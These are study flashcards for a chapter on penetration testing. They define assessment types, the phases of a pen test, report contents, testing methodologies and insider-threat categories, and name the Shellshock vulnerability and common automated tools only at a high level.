Chapter 12 - The Pen Test, Putting it all Together Flashcards
Security Assessment
any test performed to assess the level of security on an network or system
3 categories of security assessments
security audit
vulnerability assessment
penetration test
Security Audit
policy and procedure focused
tests whether the organization is following specific standards and policies they have in place
Vulnerability assessment
scans and tests a system or network for existing vulnerabilities but doesn’t exploit them
Penetration test
searches for vulnerabilities and actively seeks to exploit them
must have an agreement in place before testing begins
agreement should spell out limitations, constraints, liabilities, between organization and the pen test team. A separate indemnity form releasing you from financial liability is also necessary (ie what if port scanner accidentally takes down server)
Exam Tip, know Shellshock vulnerability
aka Bashdoor, Bash Bug, CVE-2014-6271
affected Bash shell found in most versions of Linux, Unix and Mac OS X. Also some linux-based routers with CGI-enabled web interface
External assessment
analyzes publicly available information, performs network scanning, enumeration and testing from the network perimeter. Usually the internet
Internal assessment
performed from inside the organization
define black, white, gray box testing
black - no knowledge of infrastructure. simulates outside hacker
white - complete knowledge of infrastructure. simulates insider
gray - soem information on infrastructure
red team
offense, hacking group, black box style with no knowledge
blue team
defensive team
automated testing
codenomicon
core impact pro
metasploit (with Autopwn module)
CANVAS
point and shoot with all inclusive tool set like Core Impact
can save time and money, but prone to false positives and negatives, doesn’t necessarily care about your scope agreement
3 phases of a pen test
pre-attack
attack
post-attack
pre-attack phase
reconnaissance and data gathering
ID network ranges, DNS enumeration, IP ranges, nmap network scanning, test proxy servers, checking for firewalls
attack phase
attempt to penetrate network perimeter, acquire targets, execute attacks, elevate privileges
verify ACL’s by crafting packets, seeing if you can use covert tunnels, trying XSS, buffer overflows, SQL injections, password cracking,
post attack
cleanup anything uploaded to the network. Remove tools, malware, backdoors, attack software
provide deliverables: reports, etc
5 basics of a pen test report
executive summary (if using FISMA, DIACAP, RMF, HIPAA, etc, this summary will be tailored to that)
names of participants and dates of tests
list of findings, usually ordered by risk
analysis of each finding and recommended mitigation steps
log files and evidence from your toolset. customers seem to want screenshots
Open Source Security Testing Methodology Manual (OSSTM)
created by Institute for Security and Open Methodologies (ISECOM) in 2001
effort to improve how security is tested
peer reviewed manual of security testing and analysis.
results in fact based actions that improve security
downloadable as a PDF file
constantly updated
Testing Guidelines and Methodologies
OSSTM
SANS
OWASP
OSSTM and SANS have their own methodologies
OWASP focuses on web servers and appliations
ECC 4 categories of insider threats
pure insider
insider associate
insider affiliate
outside affiliate
pure insider
an employee with all rights and access an employee has (physical and network access, badge, etc)
common problem is that their privileges are often higher than they need to be
insider associate
someone with limited access like a contractor, janitor, guard.
have physical access, not network. Not employees
insider affiliate
friend, spouse or client of the employee who uses the employees credentials to gain access.
Key thing is not the persons so much as the credentials
outsider affiliate
someone outside the organization who is untrusted, unknown but uses and open access channel to gain access
example - someone using an unsecured wireless access point
